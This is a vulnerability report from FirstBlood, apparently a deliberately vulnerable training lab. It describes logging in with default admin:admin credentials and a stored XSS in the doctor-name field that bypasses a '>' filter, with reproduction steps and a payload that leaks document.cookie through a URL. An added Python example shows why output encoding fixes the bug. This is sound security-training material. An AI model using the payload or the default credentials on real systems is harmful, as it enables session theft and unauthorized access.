FirstBlood-#1124 Stored XSS in the Doctor Name on /doctors.php as well as /about.php
This issue was discovered on FirstBlood v3
On 2022-12-08, mr_xhunt Level 8 reported:

Summary:

I was able to login using default credentials: admin:admin. While modifying the name of the Doctor, I found there is an XSS filter in the name parameter which checks for the > tag, but we can obfuscate by creating a payload without a > tag and successfully create Stored XSS against Authenticated as well as Non-Authed users.

Steps To Reproduce:

  1. You need to login to drpanel

  2. Now modify a Doctor's data and intercept the request using Burp

  3. Now put the payload in the name parameter

  4. Now send the request

  5. Now visit the endpoint: /doctors.php and /about.php, the XSS is executed and successfully leaks the Cookie of the users

POC:

  1. /doctors.php

  2. /about.php

P1 CRITICAL

Endpoint: /doctors.php & /about.php

Parameter: name

Payload: "><svg onload=alert(document.location=`https://localhost/?${document.cookie}`)//
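The weakness the report describes is a blocklist filter on stored input rather than encoding on output. The following Python model is an added illustration, not FirstBlood's code: it assumes the filter only rejects a complete tag (an opening `<` with a closing `>`), and that the doctor's name is echoed inside an HTML attribute, which is why the report's payload begins by closing a quoted attribute. It contrasts the trusting template with one that encodes for the attribute context.

```python
import html
import re

# Constructed sample input: the doctor-name payload quoted in the report above.
REPORTED_PAYLOAD = (
    '"><svg onload=alert(document.location='
    '`https://localhost/?${document.cookie}`)//'
)

# Hypothetical model of the weak filter: it only rejects a *complete* tag,
# so an unclosed "<svg ..." is stored untouched. (Assumption, not app code.)
COMPLETE_TAG = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

def weak_filter_accepts(name: str) -> bool:
    """True if the blocklist filter would store this name unchanged."""
    return COMPLETE_TAG.search(name) is None

def render_doctor_unsafe(name: str) -> str:
    """Template that trusts the stored value (the bug): the leading quote in
    the payload terminates value="..." and the rest becomes live markup."""
    return f'<input type="text" value="{name}">'

def render_doctor_safe(name: str) -> str:
    """Hardened template: encode on output for the HTML attribute context,
    so '<', '>' and '"' can never leave the attribute value."""
    return f'<input type="text" value="{html.escape(name, quote=True)}">'

def tag_names(rendered: str) -> list[str]:
    """List the element names the browser would see in the rendered HTML;
    anything beyond the template's own <input> is injected markup."""
    return [m.group(1).lower()
            for m in re.finditer(r"<([a-zA-Z][a-zA-Z0-9]*)[^>]*>", rendered)]

if __name__ == "__main__":
    print("filter accepts payload:", weak_filter_accepts(REPORTED_PAYLOAD))
    print("unsafe render tags:", tag_names(render_doctor_unsafe(REPORTED_PAYLOAD)))
    print("safe render tags:  ", tag_names(render_doctor_safe(REPORTED_PAYLOAD)))
```

`tag_names` also serves as a quick regression check for any page that echoes the stored name: the rendered output should never contain more elements than the template itself.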


FirstBlood ID: 48
Vulnerability Type: Auth issues

The /drpanel/login.php endpoint contains weak credentials which allows users to access the admin panel (admin:admin)

FirstBlood ID: 56
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /about.php endpoint via a malicious doctor's name

FirstBlood ID: 55
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /doctors.php endpoint via a malicious doctor's name

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the SECOND user to discover stored XSS on about.php via the doctor's name